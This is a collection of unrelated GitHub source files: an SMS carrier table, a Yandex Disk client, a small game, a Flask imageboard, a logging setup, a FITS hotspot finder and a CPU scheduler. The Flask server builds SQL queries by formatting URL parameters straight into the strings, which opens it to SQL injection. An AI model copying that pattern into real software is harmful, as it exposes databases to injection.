\"name\": \"Mobinil\",\n \"suffix\": \"@mobinil.net\"\n },\n \"mobistar_belgium\": {\n \"name\": \"Mobistar (Belgium)\",\n \"suffix\": \"@mobistar.be\"\n },\n \"mobitel\": {\n \"name\": \"Mobitel\",\n \"suffix\": \"@sms.mobitel.lk\"\n },\n \"movistar_spain\": {\n \"name\": \"Movistar (Spain)\",\n \"suffix\": \"@correo.movistar.net\"\n },\n \"northerntel_canada\": {\n \"name\": \"NorthernTel (Canada)\",\n \"suffix\": \"@txt.northerntelmobility.com\"\n },\n \"o2_germany\": {\n \"name\": \"o2 (Germany)\",\n \"suffix\": \"@o2online.de\"\n },\n \"o2_uk\": {\n \"name\": \"o2 (UK)\",\n \"suffix\": \"@mmail.co.uk\"\n },\n \"orange_mumbai\": {\n \"name\": \"Orange (Mumbai)\",\n \"suffix\": \"@orangemail.co.in\"\n },\n \"orange_netherlands\": {\n \"name\": \"Orange (Netherlands)\",\n \"suffix\": \"@sms.orange.nl\"\n },\n \"orange_uk\": {\n \"name\": \"Orange (UK)\",\n \"suffix\": \"@orange.net\"\n },\n \"rogers_wireless\": {\n \"name\": \"Rogers Wireless\",\n \"suffix\": \"@pcs.rogers.com\"\n },\n \"rogers_canada\": {\n \"name\": \"Rogers (Canada)\",\n \"suffix\": \"@pcs.rogers.ca\"\n },\n \"sasktel_canada\": {\n \"name\": \"SaskTel (canada)\",\n \"suffix\": \"@sms.sasktel.ca\"\n },\n \"sfr_france\": {\n \"name\": \"SFR (France)\",\n \"suffix\": \"@sfr.fr\"\n },\n \"t_mobile_austria\": {\n \"name\": \"T-Mobile (Austria)\",\n \"suffix\": \"@sms.t-mobile.at\"\n },\n \"t_mobile_germany\": {\n \"name\": \"T-Mobile (Germany)\",\n \"suffix\": \"@t-d1-sms.de\"\n },\n \"t_mobile_germany\": {\n \"name\": \"T-Mobile (Netherlands)\",\n \"suffix\": \"@gin.nl\"\n },\n \"t_mobile_uk\": {\n \"name\": \"T-Mobile (UK)\",\n \"suffix\": \"@t-mobile.uk.net\"\n },\n \"telebec_canada\": {\n \"name\": \"Telebec (Canada)\",\n \"suffix\": \"@txt.telebecmobilite.com\"\n },\n \"telefonica_spain\": {\n \"name\": \"Telefonica (Spain)\",\n \"suffix\": \"@movistar.net\"\n },\n \"telus_canada\": {\n \"name\": \"Telus (Canada)\",\n \"suffix\": \"@msg.telus.com\"\n },\n \"virgin_canada\": {\n \"name\": \"Virgin (Canada)\",\n \"suffix\": \"@vmobile.ca\"\n },\n \"vodafone_germany\": {\n \"name\": \"Vodafone (Germany)\",\n \"suffix\": \"@vodafone-sms.de\"\n },\n \"vodafone_egypt\": {\n \"name\": \"Vodafone (Egypt)\",\n \"suffix\": \"@vodafone.com.eg\"\n },\n \"vodafone_uk\": {\n \"name\": \"Vodafone (UK)\",\n \"suffix\": \"@sms.vodafone.net\"\n },\n \"vodafone_italy\": {\n \"name\": \"Vodafone (Italy)\",\n \"suffix\": \"@sms.vodafone.it\"\n },\n \"vodafone_jp_chuugoku\": {\n \"name\": \"Vodafone (Japan - Chuugoku)\",\n \"suffix\": \"@n.vodafone.ne.jp\"\n },\n \"vodafone_jp_hokkaido\": {\n \"name\": \"Vodafone (Japan - Hokkaido)\",\n \"suffix\": \"@d.vodafone.ne.jp\"\n },\n \"vodafone_jp_hokuriko\": {\n \"name\": \"Vodafone (Japan - Hokuriko)\",\n \"suffix\": \"@r.vodafone.ne.jp\"\n },\n \"vodafone_jp_kansai\": {\n \"name\": \"Vodafone (Japan - Kansai)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_osaka\": {\n \"name\": \"Vodafone (Japan - Osaka)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_kanto\": {\n \"name\": \"Vodafone (Japan - Kanto)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_koushin\": {\n \"name\": \"Vodafone (Japan - Koushin)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_tokyo\": {\n \"name\": \"Vodafone (Japan - Tokyo)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_kyuushu\": {\n \"name\": \"Vodafone (Japan - Kyuushu)\",\n \"suffix\": \"@q.vodafone.ne.jp\"\n },\n \"vodafone_jp_okinawa\": {\n \"name\": \"Vodafone (Japan - Okinawa)\",\n \"suffix\": \"@q.vodafone.ne.jp\"\n },\n \"vodafone_jp_shikoku\": {\n \"name\": \"Vodafone (Japan - Shikoku)\",\n \"suffix\": \"@s.vodafone.ne.jp\"\n },\n \"vodafone_jp_touhoku\": {\n \"name\": \"Vodafone (Japan - Touhoku)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_jp_niigata\": {\n \"name\": \"Vodafone (Japan - Niigata)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_jp_toukai\": {\n \"name\": \"Vodafone (Japan - Toukai)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_spain\": {\n \"name\": \"Vodafone (Japan - Spain)\",\n \"suffix\": \"@vodafone.es\"\n }\n}\n\ncarrier_slugs = carriers.keys()\ncarrier_form_tuples = [(key, carriers[key]['name']) for key in carriers.keys()]\n","repo_name":"kevana/corpscores","sub_path":"dci_notify/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":9540,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"1374652851","text":"\"\"\"\nhttps://yadisk.readthedocs.io/ru/latest/intro.html\nhttps://github.com/ivknv/yadisk\n\"\"\"\nimport logging\nimport yadisk\n\n\nbase_manager_logger = logging.getLogger(__name__)\n\n\nclass YandexDiskBaseManager:\n \"\"\"Yandex disk clients base manager.\"\"\"\n\n def get_oauth_code_url(self, client_id: str, state: str, redirect_url: str) -> str:\n base_manager_logger.info(f\"Yandex disk base manager: get oauth code url started\")\n\n client = yadisk.YaDisk(client_id)\n url = client.get_code_url(state=state, redirect_url=redirect_url)\n\n base_manager_logger.info(f\"Yandex disk base manager: get oauth code url finished - {url}\")\n return url\n\n def get_tokens_from_response(self, response) -> dict:\n return {\n 'access_token': response.access_token,\n 'refresh_token': response.refresh_token,\n 'token_type': response.token_type,\n 'expires_in': response.expires_in,\n }\n\n def get_tokens(self, client_id: str, client_secret: str, code: str) -> dict:\n base_manager_logger.info(\"Yandex disk base manager: get tokens started\")\n\n client = yadisk.YaDisk(client_id, client_secret)\n response = client.get_token(code)\n\n base_manager_logger.info(\"Yandex disk base manager: get tokens finished\")\n return self.get_tokens_from_response(response)\n\n def check_access_token(self, access_token: str, **kwargs) -> bool:\n logger = kwargs.get(\"logger\", base_manager_logger)\n logger.info(\"Yandex disk base manager: check access token started\")\n\n client = yadisk.YaDisk(token=access_token)\n try:\n client.get_disk_info()\n except Exception:\n base_manager_logger.info(\"Yandex disk base manager: access token not valid\")\n return False\n\n logger.info(\"Yandex disk base manager: access token valid\")\n return True\n\n def refresh_token(self, config, **kwargs) -> dict:\n logger = kwargs.get(\"logger\", base_manager_logger)\n logger.info(\"Yandex disk base manager: refresh token started\")\n client = yadisk.YaDisk(id=config[\"client_id\"], secret=config[\"client_secret\"])\n response = client.refresh_token(config[\"refresh_token\"])\n\n logger.info(\"Yandex disk base manager: refresh token finished\")\n return self.get_tokens_from_response(response)\n\n def get_folder_files(self, access_token: str, folder_name: str, logger, **kwargs) -> list:\n try:\n logger.info(\"Yandex disk base manager: get folder files started\")\n client = yadisk.YaDisk(token=access_token)\n files = client.listdir(folder_name)\n logger.info(f\"Yandex disk base manager: get folder files finished, files - {files}\")\n except Exception:\n logger.error(\"Yandex disk base manager: get folder files error\", exc_info=True)\n return []\n\n def create_folder(self, access_token: str, folder_name: str, logger, **kwargs) -> bool:\n try:\n logger.info(\"Yandex disk base manager: create folder started\")\n client = yadisk.YaDisk(token=access_token)\n data = client.mkdir(folder_name)\n except Exception:\n logger.error(\"Yandex disk base manager: create folder error\", exc_info=True)\n return False\n\n logger.info(f\"Yandex disk base manager: create folder finished - {data}\")\n return True\n\n def upload_file(\n self, access_token: str, source_path: str, target_path: str, **kwargs\n ) -> bool:\n logger = kwargs.get(\"logger\", base_manager_logger)\n logger.info(f\"Yandex disk base manager: upload file started\")\n try:\n client = yadisk.YaDisk(token=access_token)\n client.upload(source_path, target_path, overwrite=True)\n except Exception:\n logger.error(\"Yandex disk base manager: upload file error\", exc_info=True)\n\n return False\n\n logger.info(\"Yandex disk base manager: upload file finished\")\n return True\n\n def delete_file(self, access_token: str, target_path: str, **kwargs) -> bool:\n logger = kwargs.get(\"logger\", base_manager_logger)\n logger.info(f\"Yandex disk base manager: delete file started, filename - {target_path}\")\n try:\n client = yadisk.YaDisk(token=access_token)\n client.remove(target_path, permanently=True)\n except Exception:\n logger.error(\"Yandex disk base manager: delete file error\", exc_info=True)\n\n return False\n\n logger.info(\"Yandex disk base manager: delete file finished\")\n return True\n","repo_name":"postman17/backuper","sub_path":"project/helpers/base_managers/yandex_disk.py","file_name":"yandex_disk.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24958210872","text":"import os\nimport random\n\nfrom game.casting.actor import Actor\nfrom game.casting.artifact import Artifact\nfrom game.casting.cast import Cast\n\nfrom game.directing.director import Director\n\nfrom game.services.keyboard_service import KeyboardService\nfrom game.services.video_service import VideoService\n\nfrom game.shared.color import Color\nfrom game.shared.point import Point\n\n\nFRAME_RATE = 12\nMAX_X = 900\nMAX_Y = 600\nCELL_SIZE = 15\nFONT_SIZE = 15\nCOLS = 60\nROWS = 40\nCAPTION = \"Greed\"\nDATA_PATH = os.path.dirname(os.path.abspath(__file__)) + \"/data/messages.txt\"\nWHITE = Color(255, 255, 255)\nDEFAULT_ARTIFACTS = 40\n\n\ndef main():\n \n # create the cast\n cast = Cast()\n\n total_score = 0 \n \n # create the banner or text\n banner = Actor()\n #banner.set_text(total_score)\n banner.set_text(f'Score: {total_score}')\n banner.set_font_size(FONT_SIZE)\n banner.set_color(WHITE)\n banner.set_position(Point(CELL_SIZE, 0))\n cast.add_actor(\"banners\", banner)\n \n # create the robot\n x = int(MAX_X / 2)\n y = int(MAX_Y / -40) # makes the robot show at the bottom.\n position = Point(x, y)\n\n robot = Actor()\n robot.set_text(\"#\")\n robot.set_font_size(FONT_SIZE)\n robot.set_color(WHITE)\n robot.set_position(position)\n cast.add_actor(\"robots\", robot)\n \n # create the artifacts\n with open(DATA_PATH) as file:\n data = file.read()\n messages = data.splitlines()\n\n seq = [42, 111]\n for n in range(DEFAULT_ARTIFACTS):\n text = chr(random.choice(seq))\n #text = chr(random.randint(33, 126))\n message = messages[n]\n\n x = random.randint(1, COLS - 1)\n #y = random.randint(1, ROWS - 1)\n #y = 0\n y = random.randint(1,5)\n position = Point(x, y)\n position = position.scale(CELL_SIZE)\n\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n color = Color(r, g, b)\n\n # creating the velocity \n x_v = 0\n y_v = 2\n velocity = Point(x_v, y_v)\n \n artifact = Artifact()\n artifact.set_text(text)\n artifact.set_font_size(FONT_SIZE)\n artifact.set_color(color)\n artifact.set_position(position)\n artifact.set_message(message)\n artifact._velocity = velocity\n artifact.move_next(MAX_X, MAX_Y)\n cast.add_actor(\"artifacts\", artifact)\n \n # start the game\n keyboard_service = KeyboardService(CELL_SIZE)\n video_service = VideoService(CAPTION, MAX_X, MAX_Y, CELL_SIZE, FRAME_RATE)\n director = Director(keyboard_service, video_service)\n director.start_game(cast)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"magoodsell/CSE_210","sub_path":"rfk-incomplete/rfk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33926318548","text":"from flask import Flask, request, render_template, g\nfrom werkzeug.utils import secure_filename\nimport sqlite3, datetime, os, random\n\n#DATABASE = 'chan.db'\n#UPLOAD_FOLDER = 'static/uploads'\nDATABASE = '/home/Rukkaitto/frchan/chan.db'\nUPLOAD_FOLDER = '/home/Rukkaitto/frchan/static/uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'webm'])\nSITE_NAME = 'frchan'\n\napp = Flask(__name__, static_url_path='/static')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\ndef index():\n boards = query_db(\"select * from boards order by board_short_name asc\")\n return render_template('homepage.html', boards=boards, site_name=SITE_NAME)\n\n@app.route('/')\ndef board(board):\n boards = query_db(\"select * from boards order by board_short_name asc\")\n board_name = query_db('select board_description from boards where board_short_name=\"{}\"'.format(board))\n posts = query_db('select * from posts where board=\"{}\"'.format(board))\n return render_template('board.html', posts=posts, board=board, site_name=SITE_NAME, boards=boards, board_name=board_name[0][0])\n\n@app.route('//post', methods = ['POST'])\ndef post(board):\n filename = ''\n if 'image' in request.files:\n filename = upload_image(request.files['image'])\n\n now = datetime.datetime.now()\n name = request.form.get('name')\n post_text = request.form.get('post_text')\n if post_text == '':\n return 'Empty post: not allowed'\n\n if filename=='':\n return 'Error: no file selected'\n\n if name=='':\n name='Anonymous'\n\n post = (name,now.isoformat(),board,post_text,filename)\n\n print (create_post(post))\n return render_template('post_successful.html', board=board)\n\n@app.route('//replies/')\ndef reply(board, post_id):\n replies = query_db('select * from replies where replying_to=\"{}\"'.format(str(post_id)))\n\n return render_template('replies.html', board=board, post_id=post_id, replies=replies)\n\n@app.route('//replies//post', methods = ['POST'])\ndef post_reply(board, post_id):\n filename = ''\n if 'image' in request.files:\n filename = upload_image(request.files['image'])\n\n now = datetime.datetime.now()\n name = request.form.get('name')\n post_text = request.form.get('post_text')\n\n if name=='':\n name='Anonymous'\n\n post = (name,now.isoformat(),board,post_text,filename,post_id)\n print (create_reply(post))\n return render_template('post_successful.html', board=board)\n\ndef get_db():\n db = getattr(g, '_database', None)\n\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n\n return db\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\ndef create_post(request):\n query = ''' INSERT INTO posts(user, date, board, post_text, image_file) values (?,?,?,?,?) '''\n cur = get_db().cursor()\n cur.execute(query, request)\n get_db().commit()\n cur.close()\n return cur.lastrowid\n\ndef create_reply(request):\n query = ''' INSERT INTO replies(user, date, board, post_text, image_file, replying_to) values (?,?,?,?,?,?) '''\n cur = get_db().cursor()\n cur.execute(query, request)\n get_db().commit()\n cur.close()\n return cur.lastrowid\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.',1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef upload_image(image):\n filename=''\n if image and allowed_file(image.filename):\n filename = secure_filename(image.filename)\n newfilename = str(random.randint(10000,100000))+'.'+filename.rsplit('.',1)[1].lower()\n image.save(os.path.join(app.config['UPLOAD_FOLDER'], newfilename))\n return newfilename\n","repo_name":"Rukkaitto/frchan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341169708","text":"#!/bin/env python3\n# coding: utf-8\n\nimport os\nimport sys\nimport logging\nimport logging.config\nfrom pathlib import Path\nfrom dotenv import load_dotenv\n\n\nlogger = logging.getLogger(\"host-service.bin._base\")\n\nWORKDIR = Path(__file__).parent.parent.absolute()\nsys.path.insert(0, str(WORKDIR))\nos.chdir(WORKDIR)\n\nload_dotenv()\n\n# 创建日志目录\nLOG_DIR = WORKDIR.joinpath(\"logs\")\nif not LOG_DIR.exists():\n LOG_DIR.mkdir()\n\n\ndef is_systemd() -> bool:\n \"\"\"判断是否是systemd\"\"\"\n if os.getenv(\"INVOCATION_ID\"):\n return True\n if os.getppid() == \"1\":\n return True\n return False\n\n\nIS_SYSTEMD = is_systemd()\n\n\ndef logging_configurator(\n name=__name__,\n console_print=True,\n console_level=\"DEBUG\",\n file_level=\"INFO\",\n):\n \"\"\"创建日志配置\"\"\"\n handlers = [\"file\"]\n if console_print:\n handlers.append(\"console\")\n\n log_config = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"simple\": {\"format\": \"%(asctime)s %(name)s %(levelname)s - %(message)s\"},\n \"systemd\": {\"format\": \"%(name)s %(levelname)s - %(message)s\"},\n \"error\": {\n \"format\": (\n \"TIME = %(asctime)s \\n\"\n \"FILE_NAME = %(filename)s \\n\"\n \"FUNC_NAME = %(funcName)s \\n\"\n \"LINE_NO = %(lineno)d \\n\"\n \"LEVEL = %(levelname)s \\n\"\n \"MESSAGE = %(message)s \\n\"\n \"EXCEPTION = %(exc_info)s \\n\"\n \"+------------------------------------------+\"\n )\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"systemd\" if is_systemd() else \"simple\",\n \"level\": console_level,\n },\n \"file\": {\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"formatter\": \"simple\",\n \"level\": file_level,\n \"filename\": f\"logs/{name}.log\",\n \"mode\": \"a+\",\n \"maxBytes\": 50 * 1024**2,\n \"backupCount\": 5,\n },\n \"file_warning\": {\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"formatter\": \"error\",\n \"level\": \"WARNING\",\n \"filename\": f\"logs/{name}-error.log\",\n \"mode\": \"a+\",\n \"maxBytes\": 50 * 1024**2,\n \"backupCount\": 5,\n },\n \"root_handler\": {\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"simple\",\n \"filename\": \"logs/root.log\",\n \"mode\": \"a+\",\n \"maxBytes\": 50 * 1024**2,\n \"backupCount\": 5,\n },\n \"loki\": {\n \"class\": \"tools.logging_handle.LokiHandler\",\n \"formatter\": \"simple\",\n \"level\": \"DEBUG\",\n \"flush_level\": \"WARNING\",\n \"capacity\": 50,\n \"host\": os.getenv(\"LOKI_HOST\"),\n \"user_id\": os.getenv(\"LOKI_USER_ID\"),\n \"api_key\": os.getenv(\"LOKI_API_KEY\"),\n \"verify\": False,\n },\n },\n \"loggers\": {\n \"host-service\": {\n \"handlers\": handlers,\n \"level\": \"DEBUG\",\n }\n },\n \"root\": {\n \"handlers\": [\"root_handler\", \"file_warning\", \"loki\"],\n \"level\": \"DEBUG\",\n },\n }\n logging.config.dictConfig(log_config)\n logger.warning(f\"Restart {name} ......\")\n\n\nif __name__ == \"__main__\":\n logging_configurator()\n logger = logging.getLogger(\"host-service\")\n print(logger.handlers)\n","repo_name":"lee-cq/host-service","sub_path":"bin/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73452325546","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n tornado application\n\"\"\"\nfrom tornado.web import Application\nfrom tornado_sqlalchemy import make_session_factory\n\nfrom config import CONFIG\nfrom url_mapping import ROUTES\nfrom app.models import *\n\nsession_factory = make_session_factory(CONFIG.MYSQL_URI)\n\ndef init_data():\n session = session_factory.make_session()\n init_users = User.gen_users()\n for user in User.gen_users():\n session.add(user)\n try:\n session.commit()\n print('generate users successfully')\n except IntegrityError:\n session.rollback()\n print('faill to generate users')\n\n\nclass App(Application):\n def __init__(self,config):\n tornado_settings = config.TORNADO_SETTINGS\n print(tornado_settings)\n print(ROUTES)\n Application.__init__(self, handlers=ROUTES, session_factory=session_factory,**tornado_settings)\n\n\ndef create_app():\n app = App(CONFIG)\n return app\n","repo_name":"haojunyu/rec_platform","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18162170726","text":"#! /usr/bin/env python3\n\nfrom astropy.utils.exceptions import AstropyWarning, AstropyUserWarning\nfrom astropy.io import fits\nimport argparse\nimport datetime\nimport re\nimport sys\nimport warnings\nimport remgeom\nimport trimarrays\nimport numpy as np\nimport miscutils\nimport copy\n\n\nclass hotspot(object):\n \"\"\"Record details of hotspot\"\"\"\n\n def __init__(self, file, row, col, val):\n self.file = file\n self.row = int(row)\n self.col = int(col)\n self.value = val\n\n def __hash__(self):\n return self.row * 1024 + self.col\n\n def __eq__(self, other):\n return self.row == other.row and self.col == other.col\n\n\ndef ptrail(s, e):\n \"\"\"Print trailing stuff\"\"\"\n if e != s:\n print(\"\\t%d - %d\" % (s, e))\n else:\n print(\"\\t%d\" % s)\n\n# Shut up warning messages\n\n\nwarnings.simplefilter('ignore', AstropyWarning)\nwarnings.simplefilter('ignore', AstropyUserWarning)\nwarnings.simplefilter('ignore', UserWarning)\n\nparsearg = argparse.ArgumentParser(description='Get list of hotspots in one or more filess',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparsearg.add_argument('files', type=str, nargs='+', help='List of files to select grom')\nparsearg.add_argument('--nstd', type=float, default=5.0, help='Number of std devs to select from')\nparsearg.add_argument('--trim', type=int, default=100, help='Ammount to trim each side')\nparsearg.add_argument('--percent', type=float, default=1.0, help='Percentage of files hotspot is in to consider significant')\n\nresargs = vars(parsearg.parse_args())\n\nfiles = resargs['files']\nnstd = resargs['nstd']\ntrimsides = resargs['trim']\npercent = resargs['percent']\n\nresarray = []\n\nfilesdone = dict()\n\nfor file in files:\n\n if file in filesdone:\n continue\n\n try:\n ff = fits.open(file)\n except OSError as e:\n print(\"Cannot open\", file, e.strerror, file=sys.stderr)\n continue\n\n fdat = ff[0].data\n ff.close()\n stripf = miscutils.removesuffix(file, all=True)\n\n fdat = trimarrays.trimzeros(trimarrays.trimnan(fdat))\n trimmed = fdat.copy()\n if trimsides > 0:\n trimmed = trimmed[trimsides:-trimsides, trimsides:-trimsides]\n fm = trimmed.mean()\n hotval = fm + trimmed.std() * nstd\n\n rwh, cwh = np.where(fdat > hotval)\n\n for r, c in zip(rwh, cwh):\n resarray.append(hotspot(stripf, r, c, fdat[r, c]))\n\n filesdone[file] = 1\n\ncollated = dict()\n\nif len(resarray) == 0:\n print(\"No hotspots found anywhere\", file=sys.stderr)\n sys.exit(1)\n\nfor res in resarray:\n\n try:\n orig = collated[res]\n except KeyError:\n orig = []\n\n orig.append(res)\n collated[res] = orig\n\nnthresh = len(filesdone) * percent / 100.0\npc = 100.0 / len(filesdone)\n\nselected = []\nfor v in collated.values():\n if len(v) >= nthresh:\n selected.append((v[0].row, v[0].col, len(v)))\n\nprint(len(selected), \"hostpots found\")\nbyvalrowcol = sorted(sorted(sorted(selected, key=lambda x: x[1]), key=lambda x: x[0]), key=lambda x: x[2], reverse=True)\nbyvalcolrow = sorted(sorted(sorted(selected, key=lambda x: x[0]), key=lambda x: x[1]), key=lambda x: x[2], reverse=True)\nrowcol = sorted(sorted(selected, key=lambda x: x[1]), key=lambda x: x[0])\ncolrow = sorted(sorted(selected, key=lambda x: x[0]), key=lambda x: x[1])\n\nlastval = -9\n\nprint(\"By value, row, column:\")\nfor r, c, v in byvalrowcol:\n if v != lastval:\n print(\"%d occurences %7.2f:\" % (v, v * pc))\n lastval = v\n print(\"\\t%4d%4d\" % (r, c))\n\nlastval = -9\n\nprint(\"By value, column, row\")\nfor r, c, v in byvalcolrow:\n if v != lastval:\n print(\"%d occurences %7.2f:\" % (v, v * pc))\n lastval = v\n print(\"\\t%4d%4d\" % (r, c))\n\nprint(\"By row\")\nlastval = -9\nstsq = endsq = -100\n\nfor r, c, v in rowcol:\n if lastval != r:\n print(\"Row %d\" % r)\n lastval = r\n if stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = -100\n if endsq == c - 1:\n endsq = c\n else:\n if stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = c\n\nif stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = -100\n\nlastval = -9\nfor r, c, v in colrow:\n if lastval != c:\n print(\"Column %d\" % c)\n lastval = c\n if stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = -100\n if endsq == r - 1:\n endsq = r\n else:\n if stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = r\nif stsq >= 0:\n ptrail(stsq, endsq)\n stsq = endsq = -100\n","repo_name":"JohnMCollins/python-astro-progs","sub_path":"Numpy/remfits/hotspots.py","file_name":"hotspots.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28637864714","text":"# 이름 : 박동주\n# 학번 : 2017136042\n# 2021. 4. 7.\n\n\nfrom scheduleInfo import Process\nfrom scheduleInfo import Request\nfrom chartinfo import chartinfo\nfrom collections import deque\n\nfrom time import sleep\n\nclass SRTN:\n # process_list : process 클래스 리스트\n # request : core_number, time_quantum 정보가 담겨있음\n def __init__(self, processList, request):\n self.__processList = processList\n self.__request = request\n\n def scheduling(self):\n core_num = self.__request.get_coreNumber()\n ps_list = self.__processList\n\n retList = [deque() for i in range(core_num)]\n\n Time = 0\n\n # 잔여 실행시간\n #bt = [0] * 15\n bt = dict()\n for ps in ps_list: bt[ps.get_id()] = ps.get_bt()\n\n idToProcess = dict()\n for ps in ps_list: idToProcess[ps.get_id()] = ps\n\n # 실행중인 프로세스 id\n runningProcessId = set()\n\n while sum(bt.values()) > 0:\n # 대기중인 프로세스 id\n waitingProcessId = []\n for i in range(len(ps_list)):\n id = ps_list[i].get_id()\n if bt[id] > 0 and ps_list[i].get_at() <= Time and id not in runningProcessId:\n waitingProcessId.append(id)\n\n # 대기중인 프로세스가 있으면?\n # 1. 비어있는 코어에 추가\n # 2. 실행시간을 비교 후 자리를 뺐음\n if len(waitingProcessId) > 0:\n # 잔여 실행시간 기준으로 정렬\n waitingProcessId.sort(key=lambda x: bt[x])\n\n # 적재 완료된 코어\n load_complete = [False] * core_num\n\n # 비어있는 코어에 프로세스 추가\n for i in range(core_num):\n if len(waitingProcessId) == 0: break\n if len(retList[i]) == 0 or retList[i][-1].get_process().get_id() not in runningProcessId:\n id = waitingProcessId.pop(0)\n #newProcess = Process(id, Time, 0)\n newProcess = chartinfo(Time, 0, 0, idToProcess[id])\n retList[i].append(newProcess)\n load_complete[i] = True\n runningProcessId.add(id)\n\n # 프로세스 뺐어야 하는 경우 탐색\n for i in range(core_num):\n if len(waitingProcessId) == 0: break\n if load_complete[i] : continue\n\n # 뺐어야 하는 경우 : 실행중인 프로세스보다 잔여 실행시간이 작은 게 있으면\n ps = retList[i][-1].get_process()\n currBt = bt[ps.get_id()]\n if currBt > bt[waitingProcessId[0]]:\n runningProcessId.remove(ps.get_id())\n id = waitingProcessId.pop(0)\n #newProcess = Process(id, Time, 0)\n newProcess = chartinfo(Time, Time, 0, idToProcess[id])\n retList[i].append(newProcess)\n runningProcessId.add(id)\n\n # 실행중인 프로세스 실행시간 +1\n # 실행중인 프로세스 잔여 실행시간 -1\n # 실행시간 0인 id를 runningProcessId에서 제거\n for i in range(core_num):\n if len(retList[i]) == 0: continue\n\n chartinfo1 = retList[i][-1]\n ps = chartinfo1.get_process()\n if ps.get_id() in runningProcessId:\n chartinfo1.set_end_time(Time + 1)\n\n id = ps.get_id()\n bt[id] -= 1\n if bt[id] <= 0:\n runningProcessId.remove(id)\n tt = Time + 1 - idToProcess[id].get_at()\n wt = tt - idToProcess[id].get_bt()\n ntt = tt / idToProcess[id].get_bt()\n\n idToProcess[id].set_tt(tt)\n idToProcess[id].set_wt(wt)\n idToProcess[id].set_ntt(ntt)\n\n Time += 1\n\n return retList # 스케줄링 완료된 retList 반환\n\n\n\nif __name__ == \"__main__\" :\n psList = []\n psList.append(Process(0, 0, 3))\n psList.append(Process(1, 1, 7))\n psList.append(Process(2, 3, 2))\n psList.append(Process(3, 5, 5))\n psList.append(Process(4, 6, 3))\n\n request = Request()\n request.set_coreNumber(4)\n request.set_timeQuantum(2)\n\n scheduler = SRTN(psList, request)\n q = scheduler.scheduling()\n '''\n for i in range(len(q)):\n for j in range(len(q[i])):\n print('PID%d %ds' % (q[i][j].get_id(), q[i][j].get_bt()), end=' | ')\n print()\n '''","repo_name":"kjhcocomi/process-scheduling-simulator","sub_path":"sourcecode/SRTN.py","file_name":"SRTN.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"518302016","text":"\n\n\"\"\"\ntranslate.py\n\nTranslate between different geometry file formats.\n\n-- psana\nextension: .data\nformat: flat text\nunits: microns\n\n\n-- Cheetah\nextension: .h5\nformat: HDF5\nunits: mm for x/y, microns for z\n\n\n-- CrystFEL\nextension: .geom\nformat: flat text\nunits: all CrystFEL units are pixel units, \n except the sample-to-detector offset\nreferences: http://www.desy.de/~twhite/crystfel/manual-crystfel_geometry.html\n\n\n-- Thor\nextension: .dtc\nformat: HDF5\nunits: intrinsic -- that is, any unit is allowed so long as it is\n self-consistent (all units the same)\n\n\n-- DIALS\nextension: .json\nformat JSON\nunits: intrinsic\nreferences: http://journals.iucr.org/j/issues/2014/04/00/jo5001/index.html\n http://journals.iucr.org/d/issues/2016/04/00/gm5043/index.html#BB30\n http://journals.iucr.org/d/issues/2018/09/00/lp5037/index.html\n\"\"\"\n\n\nimport os\nimport re\nimport getpass\nimport datetime\nimport h5py\nimport math\nimport warnings\nimport json\n\nimport numpy as np\n\nfrom psgeom import sensors\nfrom 